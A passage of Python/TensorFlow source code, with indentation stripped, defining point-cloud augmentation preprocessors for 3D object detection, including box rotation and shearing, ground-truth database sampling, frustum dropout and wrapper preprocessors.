"""Create and return the buffers for the for loop."""
p = self.params
bboxes_3d = features.labels.bboxes_3d
# Compute the shapes and create the buffers for the For loop.
max_num_bboxes = tf.shape(bboxes_3d)[0]
per_box_shape = [max_num_bboxes, p.max_num_points_per_bbox, 3]
out_bbox_points = inplace_ops.empty(
per_box_shape, dtype=tf.float32, init=True)
num_features = features.lasers.points_feature.shape[-1]
bbox_feature_shape = [
max_num_bboxes, p.max_num_points_per_bbox, num_features
]
out_bbox_feature = inplace_ops.empty(
bbox_feature_shape, dtype=tf.float32, init=True)
per_box_mask_shape = [max_num_bboxes, p.max_num_points_per_bbox]
out_bbox_mask = inplace_ops.empty(
per_box_mask_shape, dtype=tf.float32, init=True)
return out_bbox_points, out_bbox_feature, out_bbox_mask
def TransformFeatures(self, features):
p = self.params
num_features = features.lasers.points_feature.shape[-1]
def Transform(i, state):
"""Transform the points in bounding box `i`."""
state.points_xyz = tf.reshape(state.points_xyz, [-1, 3])
bbox_mask = tf.reshape(state.points_in_bbox_mask[:, i], [-1])
# Fetch only the points in the bounding box.
points_xyz_masked = tf.boolean_mask(state.points_xyz, bbox_mask)
points_feature_masked = tf.boolean_mask(state.points_feature, bbox_mask)
num_points = tf.shape(points_xyz_masked)[0]
# TODO(vrv): Fold the following into a single transformation
# matrix.
#
# Translate the box to the origin, then rotate the desired
# rotation angle.
translation_vec = state.bboxes_3d[i, 0:3]
rotation_vec = [state.rotation[i], 0., 0.]
pose = tf.concat([-translation_vec, rotation_vec], axis=0)
points_xyz_adj = geometry.CoordinateTransform(points_xyz_masked, pose)
if p.max_scaling is not None or p.max_shearing is not None:
# Translate the points in the bounding box by moving dz/2 so that the
# bottom of the bounding box is at Z = 0 when any of the two
# (max_scaling or max_shearing) is not None
translation_scale_or_shear = tf.stack(
[0., 0., state.bboxes_3d[i, 5] / 2], axis=0)
pose1 = tf.concat([translation_scale_or_shear, [0., 0., 0.]], axis=0)
points_xyz_adj = geometry.CoordinateTransform(points_xyz_adj, pose1)
else:
translation_scale_or_shear = tf.stack([0., 0., 0.], axis=0)
if p.max_scaling is not None:
# Perform scaling to the point cloud
# Scaling matrix
# [[s_x+1 0 0]
# [ 0 s_y+1 0]
# [ 0 0 s_z+1]]
sx = tf.random.uniform([],
minval=-p.max_scaling[0],
maxval=p.max_scaling[0],
seed=p.random_seed)
sy = tf.random.uniform([],
minval=-p.max_scaling[1],
maxval=p.max_scaling[1],
seed=p.random_seed)
sz = tf.random.uniform([],
minval=-p.max_scaling[2],
maxval=p.max_scaling[2],
seed=p.random_seed)
scaling_matrix = tf.stack(
[[sx + 1., 0., 0.], [0., sy + 1., 0.], [0., 0., sz + 1.]], axis=0)
points_xyz_adj = tf.einsum('ij,kj->ki', scaling_matrix, points_xyz_adj)
if p.max_shearing is not None:
# Perform shearing to the point cloud
# Shearing matrix
# [[1 sh_x^y sh_x^z]
# [sh_y^x 1 sh_y^z]
# [sh_z^x sh_z^y 1 ]]
sxy = tf.random.uniform([],
minval=-p.max_shearing[0],
maxval=p.max_shearing[0],
seed=p.random_seed)
sxz = tf.random.uniform([],
minval=-p.max_shearing[1],
maxval=p.max_shearing[1],
seed=p.random_seed)
syx = tf.random.uniform([],
minval=-p.max_shearing[2],
maxval=p.max_shearing[2],
seed=p.random_seed)
syz = tf.random.uniform([],
minval=-p.max_shearing[3],
maxval=p.max_shearing[3],
seed=p.random_seed)
szx = tf.random.uniform([],
minval=-p.max_shearing[4],
maxval=p.max_shearing[4],
seed=p.random_seed)
szy = tf.random.uniform([],
minval=-p.max_shearing[5],
maxval=p.max_shearing[5],
seed=p.random_seed)
shearing_matrix = tf.stack(
[[1., sxy, sxz], [syx, 1., syz], [szx, szy, 1.]], axis=0)
points_xyz_adj = tf.einsum('ij,kj->ki', shearing_matrix, points_xyz_adj)
# Translate the points back, adding noise if needed.
translation_with_noise = (
translation_vec - translation_scale_or_shear +
state.translate_pose[i])
pose2 = tf.concat([translation_with_noise, [0., 0., 0.]], axis=0)
final_points_xyz = geometry.CoordinateTransform(points_xyz_adj, pose2)
# final_points_xyz is an [M, 3] Tensor where M is the number of points in
# the box.
points_mask = tf.ones([num_points], dtype=tf.float32)
final_points_xyz = py_utils.PadOrTrimTo(final_points_xyz,
[p.max_num_points_per_bbox, 3])
final_points_feature = py_utils.PadOrTrimTo(
points_feature_masked, [p.max_num_points_per_bbox, num_features])
points_mask = py_utils.PadOrTrimTo(points_mask,
[p.max_num_points_per_bbox])
state.out_bbox_points = inplace_ops.alias_inplace_update(
state.out_bbox_points, [i], tf.expand_dims(final_points_xyz, 0))
state.out_bbox_feature = inplace_ops.alias_inplace_update(
state.out_bbox_feature, [i], tf.expand_dims(final_points_feature, 0))
state.out_bbox_mask = inplace_ops.alias_inplace_update(
state.out_bbox_mask, [i], tf.expand_dims(points_mask, 0))
return state
# Get the points and features that reside in boxes.
if 'points_padding' in features.lasers:
points_mask = 1 - features.lasers.points_padding
points_xyz = tf.boolean_mask(features.lasers.points_xyz, points_mask)
points_feature = tf.boolean_mask(features.lasers.points_feature,
points_mask)
else:
points_xyz = features.lasers.points_xyz
points_feature = features.lasers.points_feature
# Fetch real bounding boxes and compute point mask.
real_bboxes_3d = tf.boolean_mask(features.labels.bboxes_3d,
features.labels.bboxes_3d_mask)
points_in_bbox_mask = geometry.IsWithinBBox3D(points_xyz, real_bboxes_3d)
# Choose a random rotation for every real box.
num_boxes = tf.shape(real_bboxes_3d)[0]
rotation = tf.random.uniform([num_boxes],
minval=-p.max_rotation,
maxval=p.max_rotation,
seed=p.random_seed)
base_seed = p.random_seed
x_seed = base_seed
y_seed = None if base_seed is None else base_seed + 1
z_seed = None if base_seed is None else base_seed + 2
random_translate_x = tf.random.normal([num_boxes],
mean=0.0,
stddev=p.noise_std[0],
seed=x_seed)
random_translate_y = tf.random.normal([num_boxes],
mean=0.0,
stddev=p.noise_std[1],
seed=y_seed)
random_translate_z = tf.random.normal([num_boxes],
mean=0.0,
stddev=p.noise_std[2],
seed=z_seed)
translate_pose = tf.stack(
[random_translate_x, random_translate_y, random_translate_z], axis=1)
fg_xyz, fg_feature = self._Foreground(features, points_xyz, points_feature,
real_bboxes_3d, points_in_bbox_mask,
rotation, translate_pose, Transform)
# Concatenate them with the background points and features.
bg_xyz, bg_feature = self._Background(points_xyz, points_feature,
points_in_bbox_mask)
all_points = tf.concat([bg_xyz, fg_xyz], axis=0)
all_features = tf.concat([bg_feature, fg_feature], axis=0)
# Shuffle the points/features randomly.
all_points, all_features = _ConsistentShuffle((all_points, all_features),
p.random_seed)
# Padding should technically be unnecessary: the number of points before and
# after should be the same, but in practice we sometimes seem to drop a few
# points, and so we pad to make the shape fixed.
#
# TODO(vrv): Identify the source of this problem and then assert a shape
# matching check.
if 'points_padding' in features.lasers:
features.lasers.points_xyz = py_utils.PadOrTrimTo(
all_points, tf.shape(features.lasers.points_xyz))
features.lasers.points_feature = py_utils.PadOrTrimTo(
all_features, tf.shape(features.lasers.points_feature))
total_points = tf.shape(all_points)[0]
features.lasers.points_padding = 1.0 - py_utils.PadOrTrimTo(
tf.ones([total_points]), tf.shape(features.lasers.points_padding))
else:
features.lasers.points_xyz = all_points
features.lasers.points_feature = all_features
# Translate noise.
bboxes_xyz = real_bboxes_3d[..., :3]
bboxes_xyz += translate_pose[..., :3]
bboxes_dim = real_bboxes_3d[..., 3:6]
# Rotate bboxes by their corresponding rotation.
bboxes_rot = real_bboxes_3d[..., 6:]
bboxes_rot -= rotation[:, tf.newaxis]
features.labels.bboxes_3d = py_utils.PadOrTrimTo(
tf.concat([bboxes_xyz, bboxes_dim, bboxes_rot], axis=-1),
tf.shape(features.labels.bboxes_3d))
features.labels.bboxes_3d_mask = py_utils.PadOrTrimTo(
tf.ones(tf.shape(real_bboxes_3d)[0]),
tf.shape(features.labels.bboxes_3d_mask))
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class GroundTruthAugmentor(Preprocessor):
"""Augment bounding box labels and points from a database.
This preprocessor expects features to contain the following keys:
lasers.points_xyz of shape [P, 3]
lasers.points_feature of shape [P, F]
lasers.points_padding of shape [P]
labels.bboxes_3d of shape [L, 7]
labels.bboxes_3d_mask of shape [L]
labels.labels of shape [L]
Modifies the above features so that additional objects from
a groundtruth database are added.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'groundtruth_database', None,
'If not None, loads groundtruths from this database and adds '
'them to the current scene. Groundtruth database is expected '
'to be a TFRecord of KITTI or Waymo crops.')
p.Define(
'num_db_objects', None,
'Number of objects in the database. Because we use TFRecord '
'we cannot easily query the number of objects efficiencly.')
p.Define('max_num_points_per_bbox', 2048,
'Maximum number of points in each bbox to augment with.')
p.Define(
'filter_min_points', 0,
'Minimum number of points each database object must have '
'to be included in an example.')
p.Define(
'filter_max_points', None,
'Maximum number of points each database object must have '
'to be included in an example.')
p.Define(
'difficulty_sampling_probability', None,
'Probability for sampling ground truth example whose difficulty '
'equals {0, 1, 2, 3, ...}. Example: [1.0, 1.0, 1.0, 1.0] for '
'uniform sampling 4 different difficulties. Default value is '
'None = uniform sampling for all difficulties.')
p.Define(
'class_sampling_probability', None,
'Probability for sampling ground truth example based on its class index'
' Example: For KITTI classes are [Background, Car, Van, Truck, '
'Pedestrian, Person_sitting, Cyclist, Tram, Misc, DontCare], using '
'probability vector [0., 1.0, 1.0, 0., 0., 0., 0.,0., 0., 0.], we '
'uniformly sampling Car and Van. Default value is None: Uses '
'label_filter flag and does not sample based on class.')
p.Define('filter_min_difficulty', 0,
'Filter ground truth boxes whose difficulty is < this value.')
p.Define('max_augmented_bboxes', 15,
'Maximum number of augmented bounding boxes per scene.')
p.Define(
'label_filter', [],
'A list where if specified, only examples of these label integers will '
'be included in an example.')
p.Define(
'batch_mode', False, 'Bool value to control whether the whole'
'groundtruth database is loaded or partially loaded to save memory'
'usage. Setting to False loads the whole ground truth database into '
'memory. Otherwise, only a fraction of the data will be loaded into '
'the memory.')
return p
def _ReadDB(self, file_patterns):
"""Read the groundtruth database and return as a NestedMap of Tensors."""
p = self.params
def Process(record):
"""Process a groundtruth record."""
feature_map = {
'num_points': tf.io.FixedLenFeature((), tf.int64, 0),
'points': tf.io.VarLenFeature(dtype=tf.float32),
'points_feature': tf.io.VarLenFeature(dtype=tf.float32),
'bbox_3d': tf.io.VarLenFeature(dtype=tf.float32),
'label': tf.io.FixedLenFeature((), tf.int64, 0),
'difficulty': tf.io.FixedLenFeature((), tf.int64, 0),
'text': tf.io.VarLenFeature(dtype=tf.string),
}
example_data = tf.io.parse_single_example(record, feature_map)
num_points = example_data['num_points']
points = tf.reshape(_Dense(example_data['points']), [num_points, 3])
features = tf.reshape(
_Dense(example_data['points_feature']), [num_points, 1])
points_mask = tf.ones(num_points, dtype=tf.bool)
# TODO(vrv): Use random selection instead of first N points.
points = py_utils.PadOrTrimTo(points, [p.max_num_points_per_bbox, 3])
features = py_utils.PadOrTrimTo(features, [p.max_num_points_per_bbox, 1])
points_mask = py_utils.PadOrTrimTo(points_mask,
[p.max_num_points_per_bbox])
bboxes_3d = tf.reshape(_Dense(example_data['bbox_3d']), [7])
label = tf.cast(example_data['label'], tf.int32)
difficulty = tf.cast(example_data['difficulty'], tf.int32)
return (points, features, points_mask, bboxes_3d, label, difficulty)
if p.batch_mode:
# Prepare dataset for ground truth bounding boxes. Randomly shuffle the
# file patterns.
file_count = len(tf.io.gfile.glob(file_patterns))
dataset = tf.stateless_list_files(file_patterns)
dataset = dataset.apply(tf.stateless_cache_dataset())
dataset = dataset.apply(
tf.stateless_shuffle_dataset(
buffer_size=file_count, reshuffle_each_iteration=True))
dataset = dataset.interleave(
tf.data.TFRecordDataset, cycle_length=10, num_parallel_calls=10)
dataset = dataset.repeat()
# Only prefetch a few objects from the database to reduce memory
# consumption.
dataset = dataset.map(Process, num_parallel_calls=10)
# We need more bboxes than max_augmented_bboxes in a batch, because some
# of the boxes are filtered out.
dataset = dataset.batch(p.max_augmented_bboxes * 10)
dataset = dataset.apply(tf.stateless_cache_dataset()).prefetch(
p.max_augmented_bboxes * 30)
else:
# Prepare dataset for ground truth bounding boxes.
dataset = tf.stateless_list_files(file_patterns)
dataset = dataset.interleave(
tf.data.TFRecordDataset, cycle_length=10, num_parallel_calls=10)
# Read the entire dataset into memory.
dataset = dataset.take(p.num_db_objects)
dataset = dataset.map(Process, num_parallel_calls=10)
# We batch the output of the dataset into a very large Tensor, then cache
# it in memory.
dataset = dataset.batch(p.num_db_objects)
dataset = dataset.apply(tf.stateless_cache_dataset()).repeat()
iterator = dataset.make_one_shot_iterator()
input_batch = iterator.get_next()
(db_points_xyz, db_points_feature, db_points_mask, db_bboxes, db_labels,
db_difficulties) = input_batch
return py_utils.NestedMap(
points_xyz=db_points_xyz,
points_feature=db_points_feature,
points_mask=db_points_mask,
bboxes_3d=db_bboxes,
labels=db_labels,
difficulties=db_difficulties)
def _CreateExampleFilter(self, db):
"""Construct db example filter.
Args:
db: NestedMap of the following Tensors: points_mask - [N, P] - The points
mask for every object in the database, where N is the number of objects
and P is the maximum number of points per object. labels - [N] - int32
Label for each object in the database. difficulties - [N] - int32
Difficulty for each label in the database.
Returns:
A [N] boolean Tensor for each object in the database, True if
that corresponding object passes the filter.
"""
p = self.params
db_points_mask = db.points_mask
db_label = db.labels
db_difficulty = db.difficulties
num_objects_in_database = tf.shape(db_points_mask)[0]
# Filter number of objects.
points_per_object = tf.reduce_sum(tf.cast(db_points_mask, tf.int32), axis=1)
example_filter = points_per_object >= p.filter_min_points
if p.filter_max_points:
example_filter = tf.math.logical_and(
example_filter, points_per_object <= p.filter_max_points)
if p.difficulty_sampling_probability is not None:
# Sample db based on difficulity of each example.
sampling_prob = p.difficulty_sampling_probability
db_difficulty_probability = tf.zeros_like(db_difficulty, dtype=tf.float32)
for difficulty_idx, difficulty_prob in enumerate(sampling_prob):
db_difficulty_probability += (
tf.cast(tf.equal(db_difficulty, difficulty_idx), tf.float32) *
difficulty_prob)
sampled_filter = tf.random.uniform(
tf.shape(example_filter),
minval=0,
maxval=1,
dtype=tf.float32,
seed=p.random_seed)
sampled_filter = sampled_filter < db_difficulty_probability
example_filter &= sampled_filter
else:
# Filter out db examples below min difficulty
example_filter = tf.math.logical_and(
example_filter, db_difficulty >= p.filter_min_difficulty)
example_filter = tf.reshape(example_filter, [num_objects_in_database])
db_label = tf.reshape(db_label, [num_objects_in_database])
if p.class_sampling_probability is not None:
# Sample example based on its class probability.
sampling_prob = p.class_sampling_probability
db_class_probability = tf.zeros_like(db_label, dtype=tf.float32)
for class_idx, class_prob in enumerate(sampling_prob):
db_class_probability += (
tf.cast(tf.equal(db_label, class_idx), tf.float32) * class_prob)
sampled_filter = tf.random.uniform(
tf.shape(example_filter),
minval=0,
maxval=1,
dtype=tf.float32,
seed=p.random_seed)
sampled_filter = sampled_filter < db_class_probability
example_filter &= sampled_filter
elif p.label_filter:
# Filter based on labels.
# Create a label filter where all is false
valid_labels = tf.constant(p.label_filter)
label_mask = tf.reduce_any(
tf.equal(db_label[..., tf.newaxis], valid_labels), axis=1)
example_filter = tf.math.logical_and(example_filter, label_mask)
return example_filter
# TODO(vrv): Create an overlap filter that also ensures that boxes don't
# overlap with groundtruth points, so that the scenes are more plausible.
def _FilterIndices(self, gt_bboxes_3d, db_bboxes, db_idx):
"""Identify database boxes that don't overlap with other boxes."""
# We accomplish overlap filtering by first computing the pairwise 3D IoU of
# all boxes (concatenated) as a way of computing pairwise box overlaps.
num_gt_bboxes = tf.shape(gt_bboxes_3d)[0]
filtered_bboxes = tf.gather(db_bboxes, db_idx)
all_bboxes = tf.concat([gt_bboxes_3d, filtered_bboxes], axis=0)
pairwise_overlap = ops.pairwise_iou3d(all_bboxes, all_bboxes)
# We now have an M x M matrix with 1s on the diagonal and non-zero entries
# whenever a box collides with another.
#
# To increase the number of boxes selected, we filter the upper triangular
# entries so that the boxes are chosen greedily: boxes with smaller indices
# will be selected before later boxes, because earlier boxes will not appear
# to collide with later boxes, but later boxes may collide with earlier
# ones.
pairwise_overlap = tf.linalg.band_part(pairwise_overlap, -1, 0)
# We compute the sum of the IoU overlaps for all database boxes.
db_overlap_sums = tf.reduce_sum(pairwise_overlap[num_gt_bboxes:], axis=1)
# Those boxes that don't overlap with any other boxes will only have
# a 1.0 IoU with itself.
non_overlapping_boxes = tf.reshape(db_overlap_sums <= 1., [-1])
# Filter to select only those object ids that pass this filter.
db_idx = tf.boolean_mask(db_idx, non_overlapping_boxes)
return db_idx
def TransformFeatures(self, features):
p = self.params
tf.logging.info('Loading groundtruth database at %s' %
(p.groundtruth_database))
db = p.groundtruth_database.Instantiate().BuildDataSource(self._ReadDB).data
original_features_shape = tf.shape(features.lasers.points_feature)
# Compute the number of bboxes to augment.
num_bboxes_in_scene = tf.reduce_sum(
tf.cast(features.labels.bboxes_3d_mask, tf.int32))
max_bboxes = tf.shape(features.labels.bboxes_3d_mask)[0]
num_augmented_bboxes = tf.minimum(max_bboxes - num_bboxes_in_scene,
p.max_augmented_bboxes)
# Compute an object index over all objects in the database.
num_objects_in_database = tf.shape(db.points_xyz)[0]
db_idx = tf.range(num_objects_in_database)
# Find those indices whose examples pass the filters, and select only those
# indices.
example_filter = self._CreateExampleFilter(db)
db_idx = tf.boolean_mask(db_idx, example_filter)
# At this point, we might still have a large number of object candidates,
# from which we only need a sample.
# To reduce the amount of computation, we randomly subsample to slightly
# more than we want to augment.
db_idx = tf.random.shuffle(
db_idx, seed=p.random_seed)[0:num_augmented_bboxes * 5]
# After filtering, further filter out the db boxes that would occlude with
# other boxes (including other database boxes).
#
# Gather the filtered ground truth bounding boxes according to the mask, so
# we can compute overlaps below.
gt_bboxes_3d_mask = tf.cast(features.labels.bboxes_3d_mask, tf.bool)
gt_bboxes_3d = tf.boolean_mask(features.labels.bboxes_3d, gt_bboxes_3d_mask)
gt_bboxes_3d = py_utils.HasShape(gt_bboxes_3d, [num_bboxes_in_scene, 7])
db_idx = self._FilterIndices(gt_bboxes_3d, db.bboxes_3d, db_idx)
# From the filtered object ids, select only as many boxes as we need.
shuffled_idx = db_idx[0:num_augmented_bboxes]
num_augmented_bboxes = tf.shape(shuffled_idx)[0]
# Gather based off the indices.
sampled_points_xyz = tf.gather(db.points_xyz, shuffled_idx)
sampled_points_feature = tf.gather(db.points_feature, shuffled_idx)
sampled_mask = tf.reshape(
tf.gather(db.points_mask, shuffled_idx),
[num_augmented_bboxes, p.max_num_points_per_bbox])
sampled_bboxes = tf.gather(db.bboxes_3d, shuffled_idx)
sampled_labels = tf.gather(db.labels, shuffled_idx)
# Mask points/features.
sampled_points_xyz = tf.boolean_mask(sampled_points_xyz, sampled_mask)
sampled_points_feature = tf.boolean_mask(sampled_points_feature,
sampled_mask)
# Flatten before concatenation with ground truths.
sampled_points_xyz = tf.reshape(sampled_points_xyz, [-1, 3])
sampled_points_feature = tf.reshape(sampled_points_feature,
[-1, original_features_shape[-1]])
sampled_bboxes = tf.reshape(sampled_bboxes, [-1, 7])
# Concatenate the samples with the ground truths.
if 'points_padding' in features.lasers:
points_mask = tf.cast(1. - features.lasers.points_padding, tf.bool)
# Densify the original points.
dense_points_xyz = tf.boolean_mask(features.lasers.points_xyz,
points_mask)
dense_points_feature = tf.boolean_mask(features.lasers.points_feature,
points_mask)
# Concatenate the dense original points with our new sampled oints.
points_xyz = tf.concat([dense_points_xyz, sampled_points_xyz], axis=0)
points_feature = tf.concat([dense_points_feature, sampled_points_feature],
axis=0)
original_points_shape = tf.shape(features.lasers.points_xyz)
features.lasers.points_xyz = py_utils.PadOrTrimTo(points_xyz,
original_points_shape)
features.lasers.points_feature = py_utils.PadOrTrimTo(
points_feature, original_features_shape)
# Compute the modified mask / padding.
final_points_mask = py_utils.PadOrTrimTo(
tf.ones(tf.shape(points_xyz)[0]),
tf.shape(features.lasers.points_padding))
features.lasers.points_padding = 1. - final_points_mask
else:
points_xyz = tf.concat([features.lasers.points_xyz, sampled_points_xyz],
axis=0)
points_feature = tf.concat(
[features.lasers.points_feature, sampled_points_feature], axis=0)
features.lasers.points_xyz = points_xyz
features.lasers.points_feature = points_feature
# Reconstruct a new, dense, bboxes_3d vector that includes the filtered
# groundtruth bounding boxes followed by the database augmented boxes.
bboxes_3d = tf.concat([gt_bboxes_3d, sampled_bboxes], axis=0)
bboxes_3d = py_utils.PadOrTrimTo(bboxes_3d, [max_bboxes, 7])
features.labels.bboxes_3d = bboxes_3d
bboxes_3d_mask = tf.ones(
num_bboxes_in_scene + num_augmented_bboxes, dtype=tf.float32)
features.labels.bboxes_3d_mask = py_utils.PadOrTrimTo(
bboxes_3d_mask, [max_bboxes])
gt_labels = tf.boolean_mask(features.labels.labels, gt_bboxes_3d_mask)
gt_labels = py_utils.HasShape(gt_labels, [num_bboxes_in_scene])
labels = tf.concat([gt_labels, sampled_labels], axis=0)
features.labels.labels = py_utils.PadOrTrimTo(labels, [max_bboxes])
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class FrustumDropout(Preprocessor):
"""Randomly drops out points in a frustum.
All points are first converted to spherical coordinates, and then a point
is randomly selected. All points in the frustum around that point within
a given phi, theta angle width and distance to the original greater than
a given value are dropped with probability = 1 - keep_prob.
Here, we can specify whether the dropped frustum is the union or intersection
of the phi and theta angle filters.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
- lasers.points_feature of shape [P, F]
Optionally points_padding of shape [P] corresponding to the padding.
if points_padding is None, then all points are considered valid.
Modifies the following features:
lasers.points_xyz, lasers.points_feature, lasers.points_padding with points
randomly dropped out.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('theta_width', 0.03, 'Theta angle width for dropping points.')
p.Define('phi_width', 0.0, 'Phi angle width for dropping points.')
p.Define(
'distance', 0.0, 'Drop points that have larger distance to the'
'origin than the value given here.')
p.Define(
'keep_prob', 0.0, 'keep_prob: 1. = drop no points in the Frustum,'
'0 = drop all points, between 0 and 1 = down sample the points.')
p.Define(
'drop_type', 'union', 'Drop either the union or intersection of '
'phi width and theta width.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.phi_width < 0:
raise ValueError('phi_width must be >= 0, phi_width={}'.format(
p.phi_width))
if p.theta_width < 0:
raise ValueError('theta_width must be >= 0, theta_width={}'.format(
p.theta_width))
if p.distance < 0:
raise ValueError('distance must be >= 0, distance={}'.format(p.distance))
if p.keep_prob < 0 or p.keep_prob > 1:
raise ValueError('keep_prob must be >= 0 and <=1, keep_prob={}'.format(
p.keep_prob))
if p.drop_type not in ['union', 'intersection']:
raise ValueError('drop_type must be union or intersection ,'
'drop_type={}'.format(p.drop_type))
def TransformFeatures(self, features):
p = self.params
points_xyz = features.lasers.points_xyz
points_feature = features.lasers.points_feature
if 'points_padding' in features.lasers:
points_padding = features.lasers.points_padding
else:
points_padding = None
if points_padding is not None:
points_mask = tf.cast(1 - points_padding, tf.bool)
num_total_points = py_utils.GetShape(points_mask)[0]
real_points_idx = tf.boolean_mask(
tf.range(0, num_total_points, dtype=tf.int32), points_mask)
num_points = py_utils.GetShape(real_points_idx)[0]
else:
points_mask = tf.ones_like(points_xyz[:, 0], dtype=tf.bool)
num_total_points = py_utils.GetShape(points_mask)[0]
num_points = py_utils.GetShape(points_xyz)[0]
r, theta, phi = tf.unstack(
geometry.SphericalCoordinatesTransform(points_xyz), axis=-1)
def _PickRandomPoint():
point_idx = tf.random.uniform((),
minval=0,
maxval=num_points,
dtype=tf.int32)
if points_padding is not None:
point_idx = real_points_idx[point_idx]
return point_idx
# Pick a point at random and drop all points that are near that point in the
# frustum for distance larger than r; repeat this for both theta and phi.
if p.theta_width > 0:
theta_half_width = p.theta_width / 2.
point_idx = _PickRandomPoint()
# Points within theta width and further than distance will be dropped.
theta_drop_filter = ((theta < (theta[point_idx] + theta_half_width)) &
(theta > (theta[point_idx] - theta_half_width)) &
(r > p.distance))
else:
theta_drop_filter = tf.zeros_like(points_mask, dtype=tf.bool)
if p.phi_width > 0:
phi_half_width = p.phi_width / 2.
point_idx = _PickRandomPoint()
# Points within phi width and further than distance will be dropped.
phi_drop_filter = ((phi < (phi[point_idx] + phi_half_width)) &
(phi >
(phi[point_idx] - phi_half_width)) & (r > p.distance))
else:
phi_drop_filter = tf.zeros_like(points_mask, dtype=tf.bool)
# Create drop_filter by combining filters. This contains a filter for the
# points to be removed. One can use the intersection method to limit the
# dropped points be within both phi and theta ranges.
if p.drop_type == 'union':
drop_filter = theta_drop_filter | phi_drop_filter
elif p.drop_type == 'intersection':
drop_filter = theta_drop_filter & phi_drop_filter
if p.keep_prob == 0:
# Drop all points in drop_filter.
down_sampling_filter = drop_filter
else:
# Randomly drop points in drop_filter based on keep_prob.
sampling_drop_filter = tf.random.uniform([num_total_points],
minval=0,
maxval=1,
dtype=tf.float32)
# Points greater than the threshold (keep_prob) will be dropped.
sampling_drop_filter = sampling_drop_filter > p.keep_prob
# Instead of dropping all points in the frustum, we drop out points
# that are in the selected frustum (drop_filter).
down_sampling_filter = drop_filter & sampling_drop_filter
points_mask &= ~down_sampling_filter
if points_padding is not None:
features.lasers.points_padding = 1 - tf.cast(points_mask, tf.float32)
else:
features.lasers.points_xyz = tf.boolean_mask(points_xyz, points_mask)
features.lasers.points_feature = tf.boolean_mask(points_feature,
points_mask)
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class RepeatPreprocessor(Preprocessor):
"""Repeat a preprocessor multiple times.
This preprocessor takes a preprocessor as a subprocessor and apply the
subprocessor to features multiple times (repeat_count).
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('repeat_count', 1, 'Number of times the subprocessor is applied to'
' features.')
p.Define('subprocessor', None, 'One of the input preprocessors.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.subprocessor is None:
raise ValueError('No subprocessor was specified for RepeatPreprocessor.')
if p.repeat_count < 0 or not isinstance(p.repeat_count, int):
raise ValueError(
'repeat_count must be >= 0 and int, repeat_count={}'.format(
p.repeat_count))
self.CreateChild('subprocessor', p.subprocessor)
def TransformFeatures(self, features):
p = self.params
for _ in range(p.repeat_count):
features = self.subprocessor.FPropDefaultTheta(features)
return features
def TransformShapes(self, shapes):
p = self.params
for _ in range(p.repeat_count):
shapes = self.subprocessor.TransformShapes(shapes)
return shapes
def TransformDTypes(self, dtypes):
p = self.params
for _ in range(p.repeat_count):
dtypes = self.subprocessor.TransformDTypes(dtypes)
return dtypes
class RandomApplyPreprocessor(Preprocessor):
"""Randomly apply a preprocessor with certain probability.
This preprocessor takes a preprocessor as a subprocessor and apply the
subprocessor to features with certain probability.
"""
@classmethod
def Params(cls):
p = super().Params()
p.Define('prob', 1.0, 'The probability the subprocessor being executed.')
p.Define('subprocessor', None, 'Params for an input preprocessor.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.subprocessor is None:
raise ValueError('No subprocessor was specified for RepeatPreprocessor.')
if p.prob < 0 or p.prob > 1 or not isinstance(p.prob, float):
raise ValueError(
'prob must be >= 0 and <=1 and float type, prob={}'.format(p.prob))
self.CreateChild('subprocessor', p.subprocessor)
def TransformFeatures(self, features):
p = self.params
choice = tf.random.uniform(
(), minval=0.0, maxval=1.0, seed=p.random_seed) <= p.prob
# Features is passed downstream and may be modified, we make deep copies
# here to use with tf.cond to avoid having tf.cond access updated
# versions. Note that we need one copy for each branch in case the branches
# further modify features.
features_0, features_1 = features.DeepCopy(), features.DeepCopy()
features = tf.cond(choice,
lambda: self.subprocessor.TransformFeatures(features_0),
lambda: features_1)
return features
def TransformShapes(self, shapes):
shapes_transformed = self.subprocessor.TransformShapes(shapes)
if not shapes.IsCompatible(shapes_transformed):
raise ValueError(
'NestedMap structures are different between shapes and transformed'
'shapes. Original shapes: {}. Transformed shapes: {}'.format(
shapes, shapes_transformed))
def IsCompatibleWith(a, b):
return a.is_compatible_with(b)
if not all(
py_utils.Flatten(
py_utils.Transform(IsCompatibleWith, shapes, shapes_transformed))):
raise ValueError(
'Shapes after transformation - {} are different from original '
'shapes - {}.'.format(shapes_transformed, shapes))
return shapes
def TransformDTypes(self, dtypes):
transformed_dtypes = self.subprocessor.TransformDTypes(dtypes)
if transformed_dtypes != dtypes:
raise ValueError(
'DTypes after transformation of preprocessor - {} should be '
'the same as {}, but get {}.'.format(self.params.subprocessor, dtypes,
transformed_dtypes))
return dtypes
class ConstantPreprocessor(Preprocessor):
"""Preprocessor that produces specified constant values in a nested output."""
@classmethod
def Params(cls):
p = super().Params()
p.Define(
'constants', py_utils.NestedMap(),
'Map of key names to numpy arrays of constant values to use. '
'Must be a NestedMap or dict convertible to NestedMap.')
return p
def TransformFeatures(self, features):
constants = py_utils.NestedMap(self.params.constants)
features.update(constants.Transform(tf.constant))
return features
def TransformShapes(self, shapes):
constants = py_utils.NestedMap(self.params.constants)
shapes.update(
constants.Transform(lambda x: tf.TensorShape(np.array(x).shape)))
return shapes
def TransformDTypes(self, dtypes):
constants = py_utils.NestedMap(self.params.constants)
dtypes.update(constants.Transform(lambda x: tf.as_dtype(np.array(x).dtype)))
return dtypes
class IdentityPreprocessor(Preprocessor):
"""Preprocessor that passes all inputs through.
This may be useful for situations where one wants a 'no-op' preprocessor, such
as being able to randomly choose to do nothing among a set of preprocessor
choices.
"""
def TransformFeatures(self, features):
return features
def TransformShapes(self, shapes):
return shapes
def TransformDTypes(self, dtypes):
return dtypes
class RandomChoicePreprocessor(Preprocessor):
"""Randomly applies a preprocessor with specified weights.
The input at features[p.weight_tensor_key] must be a floating point vector
Tensor whose length matches the number of subprocessors to select among. The
values in that Tensor are interpreted as relative weights.
For example, if p.subprocessors = [preprocessor1, preprocessor2] and the
